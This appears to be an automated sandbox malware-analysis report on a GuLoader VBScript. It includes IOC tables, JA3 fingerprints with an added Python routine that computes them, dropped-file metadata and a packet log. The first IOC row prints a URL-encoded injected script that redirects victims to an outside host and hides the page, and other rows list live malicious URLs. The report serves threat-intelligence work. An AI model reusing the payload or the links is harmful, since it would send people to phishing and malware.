CLOUDFLARENETUS | http://0x00003.000375.64090/images.php?p=%31%30%30%35%32%30%30%30%30%36%33%39%22%3E%3C%2F%64%69%76%3E%3C%73%63%72%69%70%74%3E%77%69%6E%64%6F%77%5B%27%6C%6F%63%61%74%69%6F%6E%27%5D%5B%27%72%65%70%6C%61%63%65%27%5D%28%5B%27%68%74%74%70%73%3A%2F%2F%69%6D%70%75%74%65%6C%65%74%74%65%27%2C%20%27%72%2E%63%6F%6D%2F%30%2F%30%2F%30%2F%27%2C%20%27%39%65%36%37%33%38%30%34%63%65%35%37%37%30%32%34%33%32%63%30%65%31%66%65%33%61%63%33%35%38%39%62%27%2C%27/12/101/10542/964/156117/16845%27%5D%5B%27%6A%6F%69%6E%27%5D%28%27%27%29%29%2C%64%6F%63%75%6D%65%6E%74%5B%27%62%6F%64%79%27%5D%5B%27%73%74%79%6C%65%27%5D%5B%27%6F%70%61%63%69%74%79%27%5D%3D%30%78%30%3B%3C%2F%73%63%72%69%70%74%3E | malicious | Phisher | 188.114.96.3
CLOUDFLARENETUS | ELECTRONIC RECEIPT_Europait.html | malicious | HTMLPhisher | 104.17.2.184
CLOUDFLARENETUS | 30% Down Payment Slip.pdf_______________________________________________________.exe | malicious | AgentTesla | 104.26.12.205
CLOUDFLARENETUS | ordinul de cotatie.exe | malicious | AgentTesla | 172.67.74.152
CLOUDFLARENETUS | https://microsoftedge.microsoft.com/addons/detail/rocketreach-edge-extensio/ldjlhlheoidifojmfkjfijmdhlagakni | malicious | Unknown | 104.18.138.17
CLOUDFLARENETUS | PI_230524.exe | malicious | AgentTesla, GuLoader | 104.26.12.205
CLOUDFLARENETUS | https://drive.google.com/drive/folders/1Zsq5Vi6xg6khSGcx49wWM-Q7O4uJNp0w?usp=sharing | malicious | Unknown | 172.64.41.3
CLOUDFLARENETUS | http://mi.michaels.com/p/cp/d278335eb0e4f32c/c?mi_u=0b5077a2e65ed331ee5d2de857007cdfe1a618cd5fa2ea47fde9894ad456adce&mi_ecmp=Certificate_Reminder_T4&url=//sritulasifarmstays.in/wp#acctspayable@magmutual.com | malicious | HTMLPhisher | 104.21.24.120
GTT-BACKBONEGTTDE | http://rb.gy/pcwqse | malicious | Unknown | 69.167.127.106
GTT-BACKBONEGTTDE | http://rb.gy/707sjf | malicious | Unknown | 69.167.127.106
GTT-BACKBONEGTTDE | la.bot.arm6.elf | malicious | Unknown | 69.31.5.255
GTT-BACKBONEGTTDE | TxXQ106ErI.elf | malicious | Mirai | 208.97.218.33
GTT-BACKBONEGTTDE | 81#Uff09.exe | malicious | Unknown | 23.62.176.141
GTT-BACKBONEGTTDE | YCrL9vbZ3g.elf | malicious | Mirai | 212.222.82.254
GTT-BACKBONEGTTDE | M88FIQFvyo.elf | malicious | Mirai | 74.199.145.209
GTT-BACKBONEGTTDE | kuzen.vbs | malicious | Unknown | 23.62.176.141
GTT-BACKBONEGTTDE | JvULMWY21C.elf | malicious | Unknown | 66.227.51.92
GTT-BACKBONEGTTDE | NnS9ImJPht.elf | malicious | Unknown | 154.15.125.182
Match (JA3) | Associated Sample Name / URL | Detection | Threat Name | Context (IPs)
3b5074b1b5d032e5620f69f9f700ff0e | windows.vbs | malicious | Unknown | 104.21.28.80, 69.31.136.57
3b5074b1b5d032e5620f69f9f700ff0e | https://assets-fra.mkt.dynamics.com/0cc4a623-6510-ef11-9f83-002248da15fa/digitalassets/standaloneforms/6e39a88b-9710-ef11-9f89-002248d9c773 | malicious | Outlook Phishing, HTMLPhisher | 104.21.28.80, 69.31.136.57
3b5074b1b5d032e5620f69f9f700ff0e | 30% Down Payment Slip.pdf_______________________________________________________.exe | malicious | AgentTesla | 104.21.28.80, 69.31.136.57
3b5074b1b5d032e5620f69f9f700ff0e | ordinul de cotatie.exe | malicious | AgentTesla | 104.21.28.80, 69.31.136.57
3b5074b1b5d032e5620f69f9f700ff0e | PI_230524.exe | malicious | AgentTesla, GuLoader | 104.21.28.80, 69.31.136.57
3b5074b1b5d032e5620f69f9f700ff0e | phish_alert_sp2_2.0.0.0-214.eml | malicious | Unknown | 104.21.28.80, 69.31.136.57
3b5074b1b5d032e5620f69f9f700ff0e | https://mydhl.express.dhl$tracking_link/ | malicious | Unknown | 104.21.28.80, 69.31.136.57
3b5074b1b5d032e5620f69f9f700ff0e | https://github.com/ustaxes/UsTaxes/files/15378217/All.2023.Tax.Documents.zip | malicious | Unknown | 104.21.28.80, 69.31.136.57
3b5074b1b5d032e5620f69f9f700ff0e | https://one.acme.si/sagecn/fr.html | malicious | Unknown | 104.21.28.80, 69.31.136.57
3b5074b1b5d032e5620f69f9f700ff0e | https://organic.mushroomstrade%5B.%5Dcom/?aNqBNW=Nm&rd_DyKZBUOXd0TNevGZu3_F7iSKU5CUSZG11cnJheUBtZXJjaGFudHNjYXBpdGFsLmNvbQ== | malicious | Unknown | 104.21.28.80, 69.31.136.57
37f463bf4616ecd445d4a1937da06e19 | windows.vbs | malicious | Unknown | 104.21.28.80, 69.31.136.17
37f463bf4616ecd445d4a1937da06e19 | PI_230524.exe | malicious | AgentTesla, GuLoader | 104.21.28.80, 69.31.136.17
37f463bf4616ecd445d4a1937da06e19 | doc023571961504.bat.exe | malicious | AgentTesla, GuLoader | 104.21.28.80, 69.31.136.17
37f463bf4616ecd445d4a1937da06e19 | Clear.7z | malicious | Unknown | 104.21.28.80, 69.31.136.17
37f463bf4616ecd445d4a1937da06e19 | SwiftCopy_23052024.exe | malicious | FormBook, GuLoader | 104.21.28.80, 69.31.136.17
37f463bf4616ecd445d4a1937da06e19 | ShippingDoc_23052024.exe | malicious | FormBook, GuLoader | 104.21.28.80, 69.31.136.17
37f463bf4616ecd445d4a1937da06e19 | rPurchaseOrderPO05232024.exe | malicious | AgentTesla, GuLoader | 104.21.28.80, 69.31.136.17
37f463bf4616ecd445d4a1937da06e19 | Forfaldendes253.exe | malicious | FormBook, GuLoader | 104.21.28.80, 69.31.136.17
37f463bf4616ecd445d4a1937da06e19 | msimg32.dll | malicious | Remcos | 104.21.28.80, 69.31.136.17
37f463bf4616ecd445d4a1937da06e19 | INVOICE.js | malicious | AgentTesla | 104.21.28.80, 69.31.136.17

Both fingerprints also appear on phishing pages, an .eml and an archive analysed in the same sandbox, so they characterise the Windows TLS client stack used by the analysis machine (the PowerShell and wab.exe clients here) rather than GuLoader itself. Treat them as a pivot within this dataset, not as a standalone network indicator.
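The two hashes keying the table above are JA3 fingerprints: an MD5 over the decimal TLS version, cipher suites, extension types, supported groups and EC point formats taken from a ClientHello, with "-" between values and "," between fields, and GREASE values removed. The following Python is an added example, not part of the report or of Joe Sandbox: it parses a raw ClientHello record and computes JA3, so a reader can reproduce the derivation against a PCAP. The ClientHello it parses is assembled inline by a small builder (constructed test input, not a capture from this analysis), so its digest will not equal either hash in the table.

```python
"""Compute a JA3 fingerprint from a TLS ClientHello record.

Added example (not from the Joe Sandbox report). SAMPLE_HELLO is constructed with
build_client_hello so the parser can be exercised offline.
"""
from __future__ import annotations

import hashlib
import struct

SUPPORTED_GROUPS = 0x000A
EC_POINT_FORMATS = 0x000B


def is_grease(value: int) -> bool:
    """GREASE values (RFC 8701) are 0x0a0a, 0x1a1a, ..., 0xfafa; JA3 excludes them."""
    return (value & 0x0F0F) == 0x0A0A and (value >> 8) == (value & 0xFF)


def ja3_from_client_hello(record: bytes) -> tuple[str, str]:
    """Return (ja3_string, ja3_md5) for one TLS record carrying a ClientHello."""
    if record[0] != 0x16:
        raise ValueError("not a TLS handshake record")
    rec_len = struct.unpack_from("!H", record, 3)[0]
    hs = record[5:5 + rec_len]
    if hs[0] != 0x01:
        raise ValueError("not a ClientHello")
    pos = 4                                   # handshake type (1) + length (3)
    version = struct.unpack_from("!H", hs, pos)[0]
    pos += 2 + 32                             # legacy_version + client random
    pos += 1 + hs[pos]                        # session_id
    cs_len = struct.unpack_from("!H", hs, pos)[0]
    pos += 2
    ciphers = [c for (c,) in struct.iter_unpack("!H", hs[pos:pos + cs_len]) if not is_grease(c)]
    pos += cs_len
    pos += 1 + hs[pos]                        # compression_methods
    ext_types, groups, formats = [], [], []
    if pos < len(hs):                         # extensions block is optional
        ext_len = struct.unpack_from("!H", hs, pos)[0]
        pos += 2
        end = pos + ext_len
        while pos + 4 <= end:
            etype, elen = struct.unpack_from("!HH", hs, pos)
            pos += 4
            data = hs[pos:pos + elen]
            pos += elen
            if is_grease(etype):
                continue
            ext_types.append(etype)
            if etype == SUPPORTED_GROUPS:
                glen = struct.unpack_from("!H", data, 0)[0]
                groups = [g for (g,) in struct.iter_unpack("!H", data[2:2 + glen]) if not is_grease(g)]
            elif etype == EC_POINT_FORMATS:
                formats = list(data[1:1 + data[0]])
    ja3 = ",".join([
        str(version),
        "-".join(map(str, ciphers)),
        "-".join(map(str, ext_types)),
        "-".join(map(str, groups)),
        "-".join(map(str, formats)),
    ])
    return ja3, hashlib.md5(ja3.encode()).hexdigest()


def build_client_hello(version: int, ciphers: list[int], extensions: list[int],
                       groups: list[int], formats: list[int]) -> bytes:
    """Assemble a minimal ClientHello record (constructed test input only)."""
    ext_blob = b""
    for etype in extensions:
        if etype == SUPPORTED_GROUPS:
            body = struct.pack("!H", 2 * len(groups)) + b"".join(struct.pack("!H", g) for g in groups)
        elif etype == EC_POINT_FORMATS:
            body = bytes([len(formats)]) + bytes(formats)
        else:
            body = b""                        # other extensions carry no payload here
        ext_blob += struct.pack("!HH", etype, len(body)) + body
    body = (struct.pack("!H", version) + b"\x00" * 32 + b"\x00"
            + struct.pack("!H", 2 * len(ciphers)) + b"".join(struct.pack("!H", c) for c in ciphers)
            + b"\x01\x00"                     # one compression method: null
            + struct.pack("!H", len(ext_blob)) + ext_blob)
    hs = b"\x01" + len(body).to_bytes(3, "big") + body
    return b"\x16\x03\x01" + struct.pack("!H", len(hs)) + hs


# Constructed hello: TLS 1.2 with one GREASE cipher, extension and group to be dropped.
SAMPLE_HELLO = build_client_hello(
    version=0x0303,
    ciphers=[0x1A1A, 0xC02C, 0xC02B, 0x009F, 0x009E],
    extensions=[0x0000, SUPPORTED_GROUPS, EC_POINT_FORMATS, 0x0010, 0x2A2A],
    groups=[0x0A0A, 0x001D, 0x0017, 0x0018],
    formats=[0x00],
)

if __name__ == "__main__":
    ja3_str, ja3_md5 = ja3_from_client_hello(SAMPLE_HELLO)
    print(ja3_str)
    print(ja3_md5)
```

Because the MD5 covers the ordered list of cipher suites and extensions, two clients with the same TLS library and configuration collide on the same hash regardless of what they download, which is why the table above mixes GuLoader samples with phishing pages.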
                                        No context
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:modified
                                        Size (bytes):11608
                                        Entropy (8bit):4.8908305915084105
                                        Encrypted:false
                                        SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
                                        MD5:DD89E182EEC1B964E2EEFE5F8889DCD7
                                        SHA1:326A3754A1334C32056811411E0C5C96F8BFBBEE
                                        SHA-256:383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
                                        SHA-512:B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):64
                                        Entropy (8bit):1.1940658735648508
                                        Encrypted:false
                                        SSDEEP:3:Nlllultnxj:NllU
                                        MD5:F93358E626551B46E6ED5A0A9D29BD51
                                        SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                        SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                        SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview:@...e................................................@..........
                                        Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):475136
                                        Entropy (8bit):6.119576160135665
                                        Encrypted:false
                                        SSDEEP:12288:S8Tx5KRZ18xtSP+szdcIugOO50MMEMOk7:SdmxtSP+sJ+O5FWP7
                                        MD5:72AD21D191B58842334D32A381EA7FA8
                                        SHA1:F7375F09855A7BCE9F7A152C75E84AAC69CAF828
                                        SHA-256:87ABFAB7BF5E213FC9E63C7FA39EDFA6452EB5F7FDD668CD370D9CF4EA3EF729
                                        SHA-512:78662231C7CE0D03374B69DFD32614786DC5BF0C8AD2BAADF2143F42BB03BD378632CC457DC414AA7E3D284674CC9151C39F90D71D9A5DD15DBA689B2283386D
                                        Malicious:false
                                        Reputation:low
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                        File Type:Non-ISO extended-ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):8
                                        Entropy (8bit):3.0
                                        Encrypted:false
                                        SSDEEP:3:xQYn:9
                                        MD5:CCA1849F2B8048EF39DAF2E81AD83449
                                        SHA1:54C8DDD7319A436A7170CD2BF5D361CB6E4FCC37
                                        SHA-256:3DB18015579C84EBB08AA559B2495F9431C4DFA9F9111E1A6DC97ACF57A2ABD0
                                        SHA-512:CACFEED7ED0DE701ABDBD21BB38D86FF939E782E27A5844E5C2D682003C2D7EED1341800D64329AC83C51480BF8DBD118995AFE7646C7AF37C09E8D2E06BCECD
                                        Malicious:false
                                        Preview:..F...&A
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                        Category:dropped
                                        Size (bytes):412172
                                        Entropy (8bit):5.950223579896966
                                        Encrypted:false
                                        SSDEEP:6144:bKpwWrsZRzpbHCsCKrsJoSN8d8wWfp6hWIQbR5JW4545i2a+AWp3u8J:eprrKRdbiorsuSJAW55JWk453ZvJ
                                        MD5:614C0D722BE9595DBBDFDBADFA5EED36
                                        SHA1:6B5B83F8047285A0A95976F45457EB634D3149FB
                                        SHA-256:20C30E12F74FC4439417990B3F7531D135BA2333C6023F727F3AA3B3B3B33DB8
                                        SHA-512:C4422A467A8C0B3C02460F5EC37090B11FAA15B4A59684C584FBF76F746ADFDDED29DBB4474B4635B7B5BCC31AA05C48A087CC77096E0ED870DBEE7C9DF7EE70
                                        Malicious:false
                                        File type:ASCII text, with CRLF line terminators
                                        Entropy (8bit):5.072724125125465
                                        TrID:
                                        • Visual Basic Script (13500/0) 100.00%
                                        File name:update.vbs
                                        File size:74'564 bytes
                                        MD5:7bc04c5410cd2c7395ba82859240fea6
                                        SHA1:014f8e77cdedd5141c80a316fc91741efdca8586
                                        SHA256:3a262200a07c9f446ef95a399919a11960671591b90e56312c61b31c2a39dd3a
                                        SHA512:dde32bb051839b4d65edafde2189d56cd39489b70950b0ba6c4eaeb538ddac55201159995b41e9a380326cf4ad8d4703b1d25e169d71e64aab4f4ae5d6fdfb64
                                        SSDEEP:1536:b0eys3Ih0nYdMOuImdjnQKOYVDDoUFYtBQBpPz5lEiFG7A:b0E7Y+OXmJnS2/AXQP1xG7A
                                        TLSH:9B734BA1EA5D09164D4F37A9EC919982C6BCC605C22331A4FDCA178EA00B55CB3FD6DF
                                        File Content Preview:..'Straitsmen hovedlinjernes sulfhydrate..'Couscouses bayonneskinker tommeskruen; heresimach bgetrernes,..Const Vandseng = 64 ..'Mellemdistanceraket144. mummers stammefejdernes meiotically morth..'Ambulators grise acrolithic..'Undulately! funnyman solitid
                                        Icon Hash:68d69b8f86ab9a86
                                         Timestamp                            Source Port  Dest Port  Source IP     Dest IP
                                         May 23, 2024 18:25:05.374051094 CEST 49704        443        192.168.2.5   104.21.28.80
                                         May 23, 2024 18:25:05.374104977 CEST 443          49704      104.21.28.80  192.168.2.5
                                         May 23, 2024 18:25:05.374196053 CEST 49704        443        192.168.2.5   104.21.28.80
                                         May 23, 2024 18:25:05.382466078 CEST 49704        443        192.168.2.5   104.21.28.80
                                         May 23, 2024 18:25:05.382487059 CEST 443          49704      104.21.28.80  192.168.2.5
                                         May 23, 2024 18:25:05.860708952 CEST 443          49704      104.21.28.80  192.168.2.5
                                         May 23, 2024 18:25:05.861100912 CEST 49704        443        192.168.2.5   104.21.28.80
                                         May 23, 2024 18:25:05.865195990 CEST 49704        443        192.168.2.5   104.21.28.80
                                         May 23, 2024 18:25:05.865206957 CEST 443          49704      104.21.28.80  192.168.2.5
                                         May 23, 2024 18:25:05.865459919 CEST 443          49704      104.21.28.80  192.168.2.5
                                         May 23, 2024 18:25:05.875652075 CEST 49704        443        192.168.2.5   104.21.28.80
                                         May 23, 2024 18:25:05.922494888 CEST 443          49704      104.21.28.80  192.168.2.5
                                         May 23, 2024 18:25:06.126720905 CEST 443          49704      104.21.28.80  192.168.2.5
                                         May 23, 2024 18:25:06.126785994 CEST 443          49704      104.21.28.80  192.168.2.5
                                         May 23, 2024 18:25:06.126838923 CEST 49704        443        192.168.2.5   104.21.28.80
                                         May 23, 2024 18:25:06.129467964 CEST 49704        443        192.168.2.5   104.21.28.80
                                         May 23, 2024 18:25:06.191335917 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:06.191370964 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:06.191442013 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:06.191796064 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:06.191807985 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:06.902448893 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:06.902580023 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:06.905410051 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:06.905419111 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:06.905723095 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:06.906517029 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:06.954505920 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.221544981 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.221611023 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.221654892 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.221695900 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.221715927 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.221735954 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.221762896 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.254223108 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.254278898 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.254327059 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.254342079 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.254360914 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.254375935 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.344233036 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.344280958 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.344376087 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.344412088 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.344424963 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.344528913 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.371834993 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.371880054 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.372086048 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.372123003 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.372170925 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.395226002 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.395273924 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.395395041 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.395411968 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.395426035 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.395488977 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.414633989 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.414680004 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.414763927 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.414803982 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.414815903 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.414848089 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.431936026 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.432008028 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.432086945 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.432113886 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.432142019 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.432149887 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.442575932 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.442596912 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.442665100 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.442681074 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.442707062 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.442715883 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.455441952 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.455466032 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.455539942 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.455555916 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.455570936 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.455595970 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.464169979 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.464200020 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.464303970 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.464318037 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.464354992 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.499562025 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.499588013 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.499708891 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.499725103 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.499763012 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.528491974 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.528515100 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.528615952 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.528630018 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.528670073 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.535792112 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.535810947 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.535881996 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.535892010 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.535926104 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.542495966 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.542516947 CEST 443          49705      69.31.136.57  192.168.2.5
                                         May 23, 2024 18:25:07.542598009 CEST 49705        443        192.168.2.5   69.31.136.57
                                         May 23, 2024 18:25:07.542608023 CEST 443          49705      69.31.136.57  192.168.2.5
